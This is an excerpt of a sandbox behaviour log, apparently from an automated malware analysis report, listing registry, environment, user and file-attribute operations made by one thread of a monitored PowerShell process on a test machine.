Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn

Thread 0xdc8

35

0

»

Category	Operation	Information	Success	Count	Logfile

Remarks (1/1)

Monitored Processes

Behavior Information - Sequential View

Before

After